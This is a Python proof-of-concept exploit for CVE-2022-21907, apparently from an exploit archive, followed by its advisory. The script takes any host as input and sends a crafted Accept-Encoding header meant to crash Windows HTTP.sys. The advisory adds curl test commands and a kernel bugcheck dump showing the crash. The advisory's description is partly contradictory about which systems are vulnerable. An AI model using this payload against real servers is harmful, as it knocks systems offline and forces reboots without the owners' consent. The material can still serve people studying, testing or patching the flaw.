#!/usr/bin/python # Author @nu11secur1ty # CVE-2022-21907 from colorama import init, Fore, Back, Style init(convert=True) import requests import time print(Fore.RED +"Please input your host...\n") print(Style.RESET_ALL) print(Fore.YELLOW) host = input() print(Style.RESET_ALL) print(Fore.BLUE +"Sending an especially malicious crafted packet, please wait...") print(Style.RESET_ALL) time.sleep(17) print(Fore.GREEN) # The PoC :) poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\ BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\ RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\ TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\ OOOAOAOOOAOOAOOOAOOOAOOOAOO,\ ****************************stupiD, *, ,',}) # Not necessary :) print(poc,"\n") print(Style.RESET_ALL) ---- Original Advisory ---- ## Title: HTTP.sys buffer overflow denial of service ## Author: nu11secur1ty ## Date: 01.12.2022 ## Vendor: https://docs.microsoft.com/ ## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0 ## CVE-2022-21907 ## Description: NOTE: After a couple of hours of tests and experiments, there have been no vulnerabilities when we decides to install the IIS packages on these Windows platforms, it's ok, and everything is patched! Windows Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by default, but the Windows 10 version 2004 - 2020 year the HTTP Protocol Stack (HTTP.sys) is vulnerable to buffer overflow - deny of service and restart the system. The attacker can be sending a maliciously crafted package to the headers of the HTTP server of the system and this will be critical for this system! Not correctly sanitizing! Status: CRITICAL ## Simple test connection before debugging ```cmd curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package" ``` - Output: ```cmd 404 - File or directory not found.

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

``` ## 302 ```cmd curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package" ``` - Output: ```cmd 404 - File or directory not found.

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

``` ## 404 ```cmd curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package" ``` - Output: ```cmd 404 - File or directory not found.

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

``` ## Bugcheck: ```cmd 1: kd> kp Child-SP RetAddr Call Site ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69 ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0 ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323 ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63 ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5 ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51 ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218 ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7 ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112 ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55 ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28 1: kd> !analyze ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* KERNEL_SECURITY_CHECK_FAILURE (139) A kernel component has corrupted a critical data structure. The corruption could potentially allow a malicious user to gain control of this machine. Arguments: Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove). Arg2: ffffa10287993480, Address of the trap frame for the exception that caused the bugcheck Arg3: ffffa102879933d8, Address of the exception record for the exception that caused the bugcheck Arg4: 0000000000000000, Reserved Debugging Details: ------------------ *** WARNING: Unable to verify timestamp for win32k.sys BUGCHECK_CODE: 139 BUGCHECK_P1: 3 BUGCHECK_P2: ffffa10287993480 BUGCHECK_P3: ffffa102879933d8 BUGCHECK_P4: 0 PROCESS_NAME: System ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. SYMBOL_NAME: HTTP!UlFreeUnknownCodingList+63 MODULE_NAME: HTTP IMAGE_NAME: HTTP.sys FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList FAILURE_ID_HASH: {1b194f54-2d0b-e3a8-62e2-afded08822bd} Followup: MachineOwner --------- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907) ## Proof and Exploit: [href](https://streamable.com/fbojva)